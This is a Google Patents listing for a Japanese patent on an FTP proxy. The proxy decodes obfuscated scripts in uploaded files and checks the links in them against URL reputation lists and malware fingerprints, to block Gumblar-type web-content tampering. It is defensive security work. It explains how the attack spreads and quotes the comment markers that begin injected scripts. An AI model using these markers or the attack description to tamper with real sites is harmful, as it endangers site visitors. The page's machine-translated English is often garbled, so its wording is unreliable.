JP2011227884A - File upload shutoff system and file upload shutoff method - Google Patents

File upload shutoff system and file upload shutoff method Download PDF

Info

Publication number
JP2011227884A
JP2011227884A JP2011073024A JP2011073024A JP2011227884A JP 2011227884 A JP2011227884 A JP 2011227884A JP 2011073024 A JP2011073024 A JP 2011073024A JP 2011073024 A JP2011073024 A JP 2011073024A JP 2011227884 A JP2011227884 A JP 2011227884A
Authority
JP
Japan
Prior art keywords
lt
url
file
upload
ftp
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
JP2011073024A
Other languages
Japanese (ja)
Other versions
JP5749053B2 (en
Inventor
Kazunori Ando
Kenichi Sugihara
一憲 安藤
憲一 杉原
Original Assignee
Broadband Security Inc
株式会社ブロードバンドセキュリティ
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Priority to JP2010082548 priority Critical
Priority to JP2010082548 priority
Application filed by Broadband Security Inc, 株式会社ブロードバンドセキュリティ filed Critical Broadband Security Inc
Priority to JP2011073024A priority patent/JP5749053B2/en
Publication of JP2011227884A publication Critical patent/JP2011227884A/en
Application granted granted Critical
Publication of JP5749053B2 publication Critical patent/JP5749053B2/en
Application status is Active legal-status Critical
Anticipated expiration legal-status Critical

Links

Images

Abstract

PROBLEM TO BE SOLVED: To provide a file upload shutoff system and a file upload shutoff method to prevent alteration of web contents.SOLUTION: An FTP proxy server 30 is provided between an FTP server 10 for uploading files to a Web server and an FTP client computer 20 connected through a computer network 60. A determination engine 33 of the FTP proxy server 30 is connected to a URL storage database, a reputation database, a black list database, and a white list database, and determines whether a file is allowed to be uploaded to the web server according to URL reliability information with the reference to any one of a URL information extracted by a URL extraction engine 32, a reputation database DB2, a black list database BL, or a white list database WL.

Description

本発明は、コンピュータネットワークにおけるファイルのアップロード遮断システム及びファイルのアップロード遮断方法に係り、特にウェブ(Web)コンテンツあるいは設定ファイルとしてFTPでアップロードされる際に、悪質なURL/リンクを検知し、ウェブコンテンツの改ざんを防止するコンピュータネットワークにおけるファイルのアップロード遮断システム及びファイルのアップロード遮断方法に関する。 The present invention relates to upload shut down method of uploading blocking system and file of the file in a computer network, when it is uploaded by the FTP as in particular a web (Web) content or configuration file, to detect malicious URL / link, web content about upload shut down method of the upload isolation system and files in the file in a computer network to prevent tampering.

一般に、メール等のメッセージに対し、ウィルス(パターン)をゲートウエイ等で走査して、ウィルス(パターン)の存在に依存してデータ処理動作を指定し、ウィルス検出を行い、ウィルスを選択的に除去する技術が知られている(例えば、特許文献1、2)。 In general, for messages such as e-mail, a virus (pattern) is scanned in the gateway or the like, depending on the presence of virus (pattern) to specify the data processing operation, carried out virus detection, the selective removal of virus technique is known (e.g., Patent documents 1 and 2).

特開2008−171415号公報 JP 2008-171415 JP 特開2005−135024号公報 JP 2005-135024 JP

これらの特許文献は、メール本文等のメッセージ内に含まれる文字列を解析して特定パターンを検出した場合に、データの転送を中止或いは中断する技術である。 These patent documents, when detecting the specific pattern by analyzing the character string included in the message, such as a mail text, a stop or interrupt technique to transfer data.

本明細書において、「リンク」、「リダイレクト」、「不正サイト」、「不正リンク」、「不正ファイル」、「リバースProxy」、「ホワイトリスト(WL)」、「ブラックリスト(BL)」、「マルウェア(Malware)」は、以下の意味で使用する。 As used herein, the term "link", "redirect", "illegal site", "invalid link", "unauthorized file", "Reverse Proxy", "white list (WL)", "black list (BL)", " malware (malware) "is used with the following meanings.

「リンク」とは、ハイパーテキストにおいてドキュメントを結びつける役割を担う「参照」を意味する。 The term "link" refers to a "reference" to play a role in linking the documents in hypertext. ウェブ(Web)ブラウザは、リンクをたどることで、設定されたページやファイルに移動できる。 Web (Web) browser, by following the link, can be moved to set the page or file. HTMLでは<a href=url>の形式で指定される。 In HTML it is specified in the form of <a href=url>.
「リダイレクト」とは、HTTP ステータスコードの「3xx Redirection」で定義される機能である。 The "redirect", which is a function defined in the "3xx Redirection" of the HTTP status code. 代表的なものとして「301 Moved Permanently」や「302 Moved Temporarily」がある。 A "301 Moved Permanently The" and "302 Moved Temporarily" As a representative example.
リダイレクトの定義は、httpd. Redirection of definition, httpd. confや. conf Ya. htaccessなどの設定ファイルで行われるため、コンテンツ自体には含まれない。 To be done in the configuration file, such as htaccess, not included in the content itself.
「不正サイト」とは、何らかの悪意を持つ者が作成したウェブ(Web)サイトをいう。 The "illegal site", refers to the web (Web) site that was created by those who have some malicious.
「不正リンク」とは、不正サイトへの誘導を行うリンクをいう。 The "unauthorized links" refers to a link to perform the induction of the illegal site.
「不正ファイル」とは、何らかの悪意を持つ者が作成したファイルをいう。 The "unauthorized file", refers to a file that was created by those who have some malicious. コンテンツや設定ファイルなどを含む。 Including content and configuration files.
「リバースProxy」とは、特定のサーバの代理としてそのサーバへの要求を中継するProxyサーバをいう。 The "Reverse Proxy", refers to a Proxy server to relay the request to the server on behalf of a specific server. 代行されているサーバにアクセスしようとしたユーザは全てリバースProxyを経由することになるため、サーバが直接アクセスを受けることはなくなる。 Since all users trying to access the server that is intercepted will be via the reverse Proxy, the server will not receive a direct access.
「ホワイトリスト(WL)」とは、信頼できると判断されたURL,IPアドレス、FQDN、メールアドレスなどの一覧表をいう。 The "white list (WL)", say reliable and the determined URL, IP address, FQDN, the list of such e-mail address.
「ブラックリスト(BL)」とは、悪質なものと判断されたURL,IPアドレス、FQDN、メールアドレスなどの一覧表をいう。 The "black list (BL)" refers to the URL determined that the malicious, IP address, FQDN, the list of such e-mail address.
「マルウェア(Malware)」とは、不正かつ有害な動作を行う意図で作成された悪意のあるソフトウェアや悪質なコードの総称をいう。 The term "malware (Malware)", refers to a generic term for malicious software and malicious code that was created with the intention of performing an illegal and harmful behavior.

最近、ウェブサイトを改ざんしてコンテンツの中に感染用のコード(別サイトへのリンクなど)を埋め込むウィルスが流行している(例えばGumblar:ガンブラー)。 Recently, the virus to embed the code for the infection in the content by tampering with the web site (such as a link to another site) is prevalent (for example Gumblar: Gumblar). これらは、例えばJavaScript(登録商標、以下同じ)でURLを偽造し、さらに難読化されており、パターンが多数あるため、従来技術で示した特許文献1等のパターンマッチングでは検知することは非常に困難である。 These include, for example JavaScript (registered trademark, hereinafter the same) to forge a URL, is further obfuscated, since a pattern are many, very possible to detect the pattern matching, etc. Patent Document 1 shown in the prior art Have difficulty. なお、難読化とは、JavaScriptが内容を理解しにくいように加工されていることであり、unescapeやreplaceなどのJavaScriptの関数を使って難読化している場合、見た目ではプログラムの内容を把握することが困難である。 Here, the obfuscation, JavaScript is that being processed so difficult to understand the content, if you are obfuscated using JavaScript functions, such as unescape or replace, to grasp the contents of the program by appearance it is difficult.

ここで、Gumblar(ガンブラー)とは、攻撃元のURLからの「Gumblar」と呼ばれるドライブバイダウンロード攻撃の一種であり、求めるサイトと異なる別サイトである不正サイトに誘導し、不正サイトに誘導されたFTPクライアント(ユーザ端末)等のコンピュータ(PC)は、誘導先に存在するAdobe Reader(登録商標)やJava(登録商標)、Windows(登録商標)の脆弱性を突いたマルウェアに感染する。 Here, the Gumblar (Gumblar), is a kind of drive-by download attack called "Gumblar" from the source of the attack URL, induced to unauthorized site is another site that is different from the site to seek, was induced to unauthorized site FTP client (user terminal), and the like of the computer (PC) is, Adobe Reader (registered trademark) or Java (registered trademark) present in the guiding destination, infected with malware exploiting a vulnerability in Windows (registered trademark). つまり、悪質なサイトへのリンクを張って増殖する。 In other words, growing Put the link to a malicious site. 感染したFTPクライアント(ユーザ端末)PCからFTPのアカウント,パスワードを盗み、ウェブサイトを改ざんする。 Infected FTP client (user terminal) of FTP from the PC account, a password stealing, tampering with the web site. このようなGumblar(ガンブラー)は、事前に検知することが難しく、感染した後に発見、検出されることが一般的である。 Such Gumblar (Gumblar) are difficult to detect in advance, found after infection, it is common to be detected.

より詳しく述べると、日本での最初の感染が「通販サイトのGENO」だったため、「GENO」と呼ばれる(Gumblar=GENO)こともあり、2009年4〜5月頃から話題になった。 More specifically, because the first infection in Japan was "GENO of shopping site", sometimes referred to as the "GENO" (Gumblar = GENO), it has become a hot topic from around April-May 2009.
改竄されたサイトに誘導コード(マルウェアに感染させるための別サイトへのリンクを含むスクリプト)が埋め込まれており、改竄されたサイトにアクセスした場合、別サイトへ誘導される。 Induced code tampering sites are (script containing a link to another site to be infected with malware) is embedded, when accessing the alteration sites, are directed to another site. 別サイトには実行ファイル、PDF(PortableDocumentFormat,ISO32000−1/国際規格)、Adobe Flash(登録商標)などの脆弱性を突くファイル(マルウェア)が存在し、アクセスしたマシン上で実行されることでマルウェアに感染する仕組みである。 To another site run file, PDF (PortableDocumentFormat, ISO32000-1 / international standard), malware by being run on the Adobe Flash exist (registered trademark) file that poke vulnerabilities such as (malware) is, to access the machine it is a mechanism that infects. マルウェアの形態はプログラムとは限らず、悪意のあるスクリプトを内包したPDFファイルだったりする。 Malware of the form is not limited to a program, or was a PDF file enclosing the malicious script.

Gumblar(ガンブラー)には、亜種が存在し、2009年10〜11月頃から話題になったGumblar. The Gumblar (Gumblar), there is a subspecies, has become a hot topic from around October and November 2009, Gumblar. X、2009年12月頃から話題になった8080が知られている。 X, 8080, which became a topic from around December 2009 is known. 「8080」の由来は、ウィルス設置サイトへアクセスする際のポートが8080であったためとされている。 Derived from the "8080", the port at the time of access to the virus installation site has been the order was 8080. この「8080」は、「GNU GPL」「LGPL」と呼ばれることもあり、改竄部分の先頭に、 This "8080" is sometimes referred to as the "GNU GPL", "LGPL", at the beginning of the tampering part,
<script>/*GNU GPL*/ <Script> / * GNU GPL * /
<script>/*CODE1*/ <Script> / * CODE1 * /
<script>/*LGPL*/ <Script> / * LGPL * /
という表記があることが知られている。 It is known that there is notation.
この「8080」の別名の由来は、上記から始まる難読化(元の文字列を判読できないように変換する処理)したスクリプトが埋め込まれているためであり、「Pegel(ピーゲル)」と呼ばれることもある。 From alias of "8080" is for obfuscation starting from the (process to convert as unreadable original string) script is embedded, also referred to as "Pegel (Pigeru)" is there. これらの亜種であっても感染の仕組み自体は、上述の「Gumblar」と同様である。 How itself of even these subspecies infection is the same as that of the above-mentioned "Gumblar".

つまり、従来技術では、コンテンツ内にウィルスが存在する場合には、有効に作動するが、上記のようなGumblar(ガンブラー)で代表される不正サイトを介したウィルスに対しては、有効ではなかったという問題があった。 That is, in the prior art, when a virus is present in the content, effectively works when, for the virus through an illegal site represented by Gumblar (Gumblar) as described above, were not effective there is a problem in that.

本発明の目的は、ウェブコンテンツの改ざんを防止するために、ファイルのアップロード遮断システム及びファイルのアップロード遮断方法を提供することにある。 An object of the present invention, in order to prevent tampering of the web content is to provide an upload upload method of blocking blocking system and file of the file.
より詳しくは、ファイル中に含まれるURL群の評価(信用度)に基づいて、マルウェア等の存在を指すような悪質なURL/リンクを検知し、そのファイルのウェブ(Web)への公開を阻止することで、ウェブ(Web)コンテンツのリンクを辿った閲覧ユーザに発生する二次被害を防ぐことが可能なファイルのアップロード遮断システム及びファイルのアップロード遮断方法の提供を目的とする。 More specifically, based on the evaluation of the URL group included in the file (credit), it detects a malicious URL / link, such as refers to the presence of such malware, to prevent the public to the web (Web) of the file that is, an object of the present invention to provide upload shut-off system and upload method of preventing a file of files that can prevent the secondary damage that occurs to the browsing user who follow the link of the web (web) content.

前記課題は、本発明のファイルのアップロード遮断システムによれば、ウェブサーバにファイルをアップロードするためのFTPサーバと、該FTPサーバと接続されたFTPプロキシサーバと、該FTPプロキシサーバと接続されたコンピュータネットワークと、該コンピュータネットワークを介して接続されたクライアントコンピュータと、を備えた、ファイルのアップロード遮断システムであって、前記FTPプロキシサーバは、CPUと、出入力手段と、URL抽出手段と、判定手段と、URLを格納するURL格納手段と、リンク先のサイト名もしくはIPアドレスに対する信頼度を示すレピュテーション値が格納されたレピュテーション手段と、ブラックリスト格納手段と、ホワイトリスト格納手段と、を有し、前記FTPプロ Computer object is achieved, according to the upload isolation system files of the present invention, which is connected to the FTP server for uploading files to a web server, the FTP proxy server connected with the FTP server, and the FTP proxy server with a network, and a client computer connected via the computer network, and a file upload blocking system, the FTP proxy server includes a CPU, a left input means, a URL extracting means, determining means If has a URL storage means for storing the URL, the reputation means reputation value is stored which indicates the reliability of linked sites name or IP address, the black list storage unit, and white list storage means, and the FTP Pro シサーバの前記判定手段は、ファイルのウェブサーバへのアップロードの可否を判定するものであって、前記URL格納手段と、前記レピュテーション手段と、前記ブラックリスト格納手段と、前記ホワイトリスト格納手段と接続され、前記判定手段は、前記URL抽出エンジンにより、アップロードされるファイルに含まれるURL情報を取得し、該取得したURL情報と、少なくとも前記レピュテーション手段、前記ブラックリスト格納手段、前記ホワイトリスト格納手段のいずれかを参照して、前記取得したURLの信頼度情報を得て、該信頼情報をもとにファイルのウェブサーバへのアップロードの可否を判定すること、により解決される。 The determination means of Shisaba is for determining whether or not to upload to the file web server, and the URL storage means, and the reputation means, and the black list storage means, it is connected to the white list storage means , the determining means, by the URL extracting engine, obtains the URL information included in the file to be uploaded, and the acquired URL information, at least the reputation means, the black list storage means, any of the white-list storage means or reference to, to obtain reliability information of the acquired URL, to determine whether or not upload of the trust information to the web server based on the file is solved by.

このとき、前記URL情報は、難読化されたスクリプトを複号する処理で得られた情報、符号化されたURL文字列を復号する処理で得られた情報、復号されたURL文字列を分解する処理で得られた情報、前記分解された情報に基づいてホスト名,ポート番号,パス名からなる文字列を生成する処理で得られた情報、前記ホスト名に基づいてIPアドレスを取得する処理で得られた情報のうち少なくとも一つを含むように構成すると好適である。 At this time, the URL information, decomposes the information obtained in the process of decoding the obfuscated script, information obtained in the process of decoding the encoded URL string, the decoded URL string information obtained by the process, the host name based on the resolved information, port number, information obtained in the process of generating a string of the pathname, the process of obtaining the IP address based on the host name it is preferable to configure to include at least one of the obtained information.

また前記ファイルのアップロード遮断システムは、さらに電子指紋計算手段と、マルウェア判定手段と、マルウェアの電子指紋が蓄積された電子指紋蓄積手段と、を備え、アップロードされるファイルの電子指紋と、前記電子指紋蓄積手段を対比し、マルウェアを検知するように構成するとよい。 The upload isolation system of the file, further a fingerprint calculating unit, and Malware determining means includes a fingerprint storage means for malware fingerprint is stored, and a fingerprint of the file to be uploaded, the fingerprint by comparison storage means it may be configured to detect the malware.
このように構成すると、「マルウェアへのリンクを含むファイル」だけではなく「マルウェア自体」のアップロードを防ぐ機能を付加することとなり、より確実に遮断が可能となる。 With this configuration, it is possible to add a function to prevent the upload of not only "file that contains a link to malware" "Malware itself", it is possible more reliably blocked.

さらに、前記判定手段は、前記URL格納手段に格納されたURLに対して定期的に信頼度を検査し、再度公開に足る信頼度を持つかどうかを判定して、書き換えられるように構成すると、より好適である。 Furthermore, the determination unit checks regularly reliability on the stored URL to the URL storage means, to determine whether with a reliability sufficient to republish, when configured to be rewritten, it is more preferable. このように構成することにより、URL格納データベースを定期的に再審査する機能を付加させることが可能となる。 With this configuration, it is possible to add a function to periodically re-reviewed URL storage database.

また、レピュテーション手段は、前記FTPプロキシサーバとネットワークで接続された外部に設けられているものを用いることが可能である。 Furthermore, reputation means may be used as provided in said connected by FTP proxy server and the network outside. このようにすることにより、外部のレピュテーション手段を用いることが可能となり、システム内に自ら構築する必要がなくなる。 By doing so, it is possible to use an external reputation means, themselves need not be built into the system.

前記課題は、本発明のファイルのアップロード遮断方法によれば、ウェブサーバにファイルをアップロードするためのFTPサーバと、該FTPサーバと接続されたFTPプロキシサーバと、該FTPプロキシサーバと接続されたコンピュータネットワークと、該コンピュータネットワークを介して接続されたクライアントコンピュータと、を備えたシステムにおけるファイルのアップロード遮断方法であって、アップロードされるファイルに含まれるURL情報を取得するURL情報取得工程と、前記URL情報取得工程で取得したURL情報と、該URL情報のリンク先のサイト名もしくはIPアドレスに対する信頼度を格納したレピュテーション手段、ブラックリスト格納手段、ホワイトリスト格納手段の少なくとも一つ以上を参照し Computer object is achieved, according to the upload method of preventing a file of the present invention, which is connected to the FTP server for uploading files to a web server, the FTP proxy server connected with the FTP server, and the FTP proxy server network, and a client computer connected via the computer network, a uploaded shut down method of the file in the system and a URL information acquisition step of acquiring URL information included in the file to be uploaded, the URL Referring the acquired URL information by the information acquisition step, reputation means for storing reliability of linked sites name or IP address of the URL information, the black list storage means, at least one or more white list storage unit 定する参照判定工程と、前記参照判定工程に基づくURLの信頼度情報をもとにそのファイルのウェブサーバへのアップロードの可否を判定する判定工程と、を備えていること、により解決される。 That includes a reference determination step constant to, and a determination step of determining whether the uploading of the reliability information of the URL based on the reference judging step to the web server of the file on the basis is solved by.

このとき、前記URL情報取得工程では、難読化されたスクリプトを複号する処理、符号化されたURL文字列を復号する処理、復号されたURL文字列を分解する処理、前記分解された情報に基づいてホスト名,ポート番号,パス名からなる文字列を生成する処理、前記ホスト名に基づいてIPアドレスを取得する処理のうち少なくとも一つの処理がなされると好適である。 At this time, in the URL information acquisition step, processing for decoding obfuscated script, processing of decoding the encoded URL string, process decomposes the decoded URL string, the degradation information based on the host name, port number, it is preferable that the process of generating a string of the pathname, at least one treatment of the process for acquiring the IP address based on the host name is performed.

また前記ファイルのアップロード遮断方法は、前記アップロードされるファイルの電子指紋を取得し、マルウェアの電子指紋が蓄積された電子指紋蓄積データベースを検索することで、マルウェアを検知しアップロードの可否を判定するように構成することができる。 The upload shut down method of the file, retrieves the fingerprint of the file that is the upload by malware fingerprint to search the stored fingerprint storage database, to determine whether the detected malware upload it can be configured to.

さらに、前記URL情報取得工程で得られたファイル毎のURLを記録しておくための格納手段への書込み工程と、前記URL格納手段に格納されたURLに対して定期的に信頼度を検査し、再度公開に足る信頼度を持つかどうかを判定する再審査の工程と、を備えるように構成すると好適である。 Furthermore, inspected regularly reliability to the URL information and writing process of a URL of each obtained files in acquiring step to a storage means for recording said stored in the URL storage section URL , it is preferable to configured with a, and reconsideration step of determining whether with confidence sufficient to republish.

また、リンク先のサイト名もしくはIPアドレスに対する信頼度の取得を前記FTPプロキシサーバと接続された外部のレピュテーション手段から取得するように構成することができる。 Also be configured to acquire the acquisition of confidence in the linked site name or IP address from the FTP proxy server and connected external reputation means.

本発明によれば、不正ファイルのアップデートを即時に検知・除外できる。 According to the present invention, it can immediately detect and exclude update incorrect file. つまり、FTPサーバとFTPクライアントコンピュータ(ユーザ端末)の間にFTPプロキシサーバを設置し、FTPクライアントコンピュータ(ユーザ端末)からFTPサーバにファイルを置く前にチェックし不正ファイルを除外できるので、従来の改竄検知サービスのように、アップロードされた後に異常を検知するものではなく、本発明のシステム及び方法では事前にマルウェア等を除外し、不正ファイルのアップロードを防ぐことが可能となる。 That is, set up a FTP proxy server between the FTP server and the FTP client computer (user terminal), it is possible to exclude the check unauthorized file before placing the file to an FTP server from an FTP client computer (user terminal), the conventional tamper like the detection service, and not to detect an abnormal after being uploaded, the system and method of the present invention exclude malware, etc. in advance, it is possible to prevent the upload of unauthorized file.

また、改竄元の確認が容易となる。 In addition, it is easy to confirm the falsification source. そして、不正ファイルを検知したときに、指定されたメールアドレスに検知内容を送付することができる。 Then, when it detects unauthorized file, it is possible to send the detected content to the specified e-mail address. 検知内容には、検知日時、該当するFTP ID、対象ファイル、FTPでアップロードしようとしたIPアドレスが含まれ、影響範囲の確定や事後の対応に役立つ。 The detection contents, detection date and time, the appropriate FTP ID, the target file, contains the IP address you are trying to upload FTP, help to the corresponding deterministic and post-impact range.

さらに、コンテンツ以外のファイルも検査可能となる。 In addition, it becomes possible to test other than the content file. つまり、HTTPを利用し、ウェブ(Web)ブラウザと同様にクローリングする改竄検知サービスでは存在を確認できない設定ファイルや他のコンテンツからのリンクがない独立したコンテンツのチェックが可能となる。 In other words, using HTTP, it is possible to check independent content there is no link from the configuration files and other content that can not be confirmed the presence in the tampering detection service to be crawling in the same way as the web (Web) browser. また、クローリング型で問題になるログイン認証を伴うページについても、ファイルとして一律に検査できるので、検査漏れが発生しない。 As for the page with the login authentication to be a problem in crawling type, it is possible to test across the board as a file, inspection leakage does not occur.

さらに、低負荷なものとなる。 Furthermore, it becomes low load. つまり、本発明のシステム及び方法ではFTPでアップロードしたファイルのみをチェックする。 That is, in the system and method of the present invention to check only files uploaded by FTP. このため、クローリングなどで全件検査するシステムとは異なり、検査が必要なファイルのみをチェックするため、サーバに不要な負荷をかけない。 For this reason, unlike the system of all cases examined in such as crawling, in order to check only the files that need to be inspected, not put an unnecessary load on the server.

本発明を適用したシステムの全体構成図である。 It is an overall configuration diagram of a system according to the present invention. 本発明を簡略して示す概念説明図である。 It is a conceptual explanatory view schematically showing the present invention. 本発明のファイルのアップロード遮断システムを示す概念説明図である。 It is a conceptual diagram illustrating the upload isolation system files of the present invention. FTPプロキシサーバのハード構成の一部を示す説明図である。 It is an explanatory diagram showing a part of a hardware configuration of the FTP proxy server. 本発明に係るファイルのアップロード遮断システムの機能連携を示す説明図である。 It is an explanatory view showing a function coordination upload blocking system file according to the present invention. 本発明に係るファイルのアップロード遮断システムの通信フローを示す関係図である。 It is a relationship diagram illustrating the communication flow of the upload blocking system file according to the present invention. 本発明に係るファイルのアップロード遮断システムを説明する全体図である。 It is an overall view for explaining an uploading blocking system file according to the present invention. 判定エンジンとURL格納データベースとの対応関係を示すブロック図である。 It is a block diagram showing a correspondence relationship between the determination engine and URL storage database. マルウェア検知が無い場合のフローチャートである。 It is a flow chart of the case where there is no malware detection. マルウェア検知が有る場合のフローチャートである。 Is a flowchart for malware detected there.

以下、本発明の一実施形態を図面に基づいて説明する。 Hereinafter, an embodiment of the present invention with reference to the accompanying drawings. なお、以下に説明する部材,配置等は本発明を限定するものでなく、本発明の趣旨の範囲内で種々改変することができるものである。 Note that members, arrangement, and so on described below are not intended to limit the invention, but can be variously modified within the scope of the gist of the present invention.

図1乃至図10は、本発明を示すものであり、図1はシステムの全体構成図、図2は簡略して示す概念説明図、図3はファイルのアップロード遮断システムを示す概念説明、図4はFTPプロキシサーバのハード構成の一部を示す説明図、図5はファイルのアップロード遮断システムの機能連携を示す説明図、図6はファイルのアップロード遮断システムの通信フローを示す関係図、図7はファイルのアップロード遮断システムを説明する全体図、図8は判定エンジンとURL格納データベースとの対応関係を示すブロック図、図9はマルウェア検知が無い場合のフローチャート、図10はマルウェア検知が有る場合のフローチャートである。 1 through 10, which illustrate the present invention, FIG. 1 is an overall configuration diagram of a system, Figure 2 is a conceptual explanatory view schematically showing, 3 conceptual showing a file upload blocking system, FIG. 4 explanatory view showing a part of a hardware configuration of the FTP proxy server, FIG. 5 is an explanatory diagram showing a functional linkage file upload blocking system, Figure 6 is the relationship diagram illustrating the communication flow of the upload isolation system file, Fig. 7 overall view for explaining the file upload blocking system, flowchart of FIG. 8 is a block diagram showing a correspondence relationship between the determination engine and URL storage database, FIG. 9 is a flowchart in the case where there is no malware detection, FIG. 10 is that there is malware detection it is.

本発明の概略は、ウェブ(Web)コンテンツの改ざんを防止するためのシステム及び方法であり、いわばリンクのスクリーニングシステム及びリンクのスクリーニング方法でもあり、ウェブ(Web)サーバの入口で阻止し、未然に感染を防ぐシステム及び方法である。 Summary of the present invention is a system and method for preventing alteration of the web (Web) content, is also a so to speak link screening systems and links of the screening method, to prevent the entrance of the web (Web) server, in advance is a system and method prevent infection. 本発明は、要するにアプライアンス型のFTP中継・フィルタシステム及び方法である。 The present invention is a short appliance type FTP relay filter system and method. 本発明は、アップ時のチェックと、既にアップされているページのチェックの両方を行なえるシステム及び方法である。 The present invention includes a check during up is already up has been of pages checked both capable systems and methods.

つまり、図2で示すように、アップ時のチェックシステム及び方法としては、クライアント側のFTPクライアントコンピュータ(ユーザ端末20:PC)とウェブ(Web)サーバ(FTPサーバ10)の間に、不正を検出するために本発明のシステムや方法を介在させる。 That is, as shown in Figure 2, as a check system and method for time-up, the client-side of the FTP client computer (user terminal 20: PC) and between the web (Web) server (FTP server 10), detect illegal the system and method of the present invention is interposed in order to. そして、図3で示すように、ユーザが、FTPクライアントコンピュータ(ユーザ端末)20からウェブ(Web)サーバ(FTPサーバ)10にコンテンツをアップしようとするときに、その内容をチェックする。 Then, as shown in Figure 3, the user, when trying to up content from FTP client computer (user terminal) 20 to the web (Web) server (FTP server) 10, to check its contents. コンテンツ、リンクを解析し、問題があった場合にはアップロードを遮断する。 Content, analyzes the link, to cut off the upload if there is a problem. そして、問題のないファイルのみをFTPサーバ10へ転送する。 Then, the transfer only the file without a problem to the FTP server 10. また、システム管理者へ通知する。 In addition, it notifies the system administrator. このとき、どこから送られてきたのか(改ざん元)も特定できる。 At this time, from where was sent or (falsification source) can also be specified. JavaScriptでURLを偽造している場合、一般に、難読化されており、パターンが多数有りパターンマッチングでは検知できないため、解析(解読)を行って、この解析により、URLを検出する。 If JavaScript spoofed the URL, in general, have been obfuscated, it can not be detected by pattern matching There pattern number, performing analysis (decrypted) by the analysis, to detect a URL. また、レピュテーションサービス(自ら構成或いは第三者が提供:データベースが高品質)を用いて、リンク先(IPアドレス)の信頼度をチェックし、信頼度が低いと判断された場合には、アップロードを遮断するものである。 In addition, reputation services (their own configuration or a third party to provide: the database is high quality) was used to check the reliability of the link destination (IP address), if the reliability is determined to be low, the upload it is intended to block.

一方、既にアップされているページのチェック方法としては、既にアップロードされているページの信頼度のチェックを行うように構成している。 On the other hand, as a method of checking the pages that have already been up, already configured to perform a check of the reliability of the pages that have been uploaded. 例えば、アップロードのときにリンク情報をデータベースに蓄積し、そのデータベースを用いて定期的にチェックする。 For example, it accumulates the link information to the database when the upload periodically checks using the database. これにより、DNSが変わってリンク情報がすりかえられることがあっても、対応することが可能となる。 Thus, even if the link information change the DNS is swap, it is possible to correspond.

本発明のシステム及び方法は、基本構成では1日あたり3万件以下のFTPによるファイルアップロードが可能である(1ファイルあたり平均100Kbyte以下を想定)。 The system and method of the present invention, (assuming an average 100Kbyte less per file) 30,000 file uploads following FTP are possible per day in basic configuration.
本発明のシステム及び方法では、FTPクライアントコンピュータ(ユーザ端末)20の認証情報を有せず、認証の制御はFTPサーバ10が行なうもので、FTPクライアントコンピュータ(ユーザ端末)20がファイルをアップロードする場合のみ、ファイル検査を行い、FTPサーバ10へのアップロードを実行するか否かを制御するものである。 In the system and method of the present invention, not have the authentication information of the FTP client computer (user terminal) 20, control of authentication by way FTP server 10 performs, if the FTP client computer (user terminal) 20 to upload a file only performs file inspection, and controls whether to perform the uploading to the FTP server 10.

以下、詳細に説明する。 It will be described in detail below. 図1は、本発明のファイルのアップロード遮断システム及びファイルのアップロード遮断方法が利用されるシステムの全体構成図の一例を示すものであり、図示されているように、ファイルのアップロード遮断システムSは、アプライアンス型のシステムであり、FTPサーバ10と、それを利用するクライアント側のFTPクライアントコンピュータ(ユーザ端末)20の間に、アプライアンス型のFTPプロキシサーバ30を設置し、各FTP(FTPサーバ10、FTPクライアントコンピュータ20)でのファイル転送を中継する。 Figure 1 shows an example of the overall configuration of a system upload blocking system and upload method of preventing a file in the file of the present invention is utilized, as shown, the upload isolation system S of the file, an appliance-type systems, the FTP server 10, between the client side of the FTP client computer (user terminal) 20 that make use of it, established the FTP proxy server 30 of the appliance type, each FTP (FTP server 10, FTP to relay the file transfer on the client computer 20). また、本実施形態では、システム管理者用コンピュータ40、顧客管理システム用コンピュータ50を備えている。 Further, in the present embodiment, a system administrator's computer 40, and a customer management system computer 50.
また、複数のクライアント側のFTPクライアントコンピュータ(ユーザ端末)20は、ネットワークとしてインターネット60と接続されている。 Further, a plurality of client-side FTP client computer (user terminal) 20 is connected to the Internet 60 as a network.

本実施形態のFTPサーバ10は、ファイルシステム(OSがファイルを管理し、データを読み書きできるようにするための仕組:例としてNTFS、FAT,HFS,ext2、ext3など)をウェブ(Web)サーバと共有し、WWWコンテンツの公開先としてファイルをアップロードすることが可能に構成されている。 FTP server 10 of the present embodiment, the file system (manages OS files, mechanisms for possible data read and write: NTFS Examples, FAT, HFS, ext2, etc. ext3) and the web (Web) server share, and is configured to be able to upload a file as a public destination of the WWW content.
実際の適用においては、対象FTPサーバ(FTPサーバ10)の指定をするが、対象とするFTPサーバ10は独自に定義する。 In practical applications, although the specification of the target FTP server (FTP server 10), FTP server 10 of interest define your own. FTP IDのサフィックスごと、または接続を受け付けるIPアドレスごとに対象FTPサーバを指定することが可能である。 Each suffix FTP ID, or for each IP address that accepts connections it is possible to specify a target FTP server.
この対象とするFTPサーバ10の指定は、開始時に、ICDの設定ファイルにて指定する。 Specification of the FTP server 10, this subject is, at the start, to specify in the ICD of the configuration file. ドメインごとに対応するFTPサーバを指定できる。 You can specify an FTP server that corresponds to each domain.

クライアント側のFTPクライアントコンピュータ(ユーザ端末)20は、URLを取得してファイルを作成及び送受信する機能を持つソフトウェアを備えており、このクライアント側のFTPクライアントコンピュータ(ユーザ端末)20は、FTPサーバ10と、FTPプロキシサーバ30を介して接続される構成となっている。 FTP client computer (user terminal) 20 on the client side is provided with a software which has the ability to create and send and receive files to obtain the URL, FTP client computer (user terminal) 20 of the client-side, FTP server 10 When, are configured to be connected via the FTP proxy server 30. つまり、クライアント側のFTPクライアントコンピュータ(ユーザ端末)20は、直接FTPサーバ10と接続されず、FTPプロキシサーバ30を介して接続される構成となっている。 That, FTP client computer (user terminal) 20 on the client side is not connected to the FTP server 10 directly, are configured to be connected via the FTP proxy server 30.

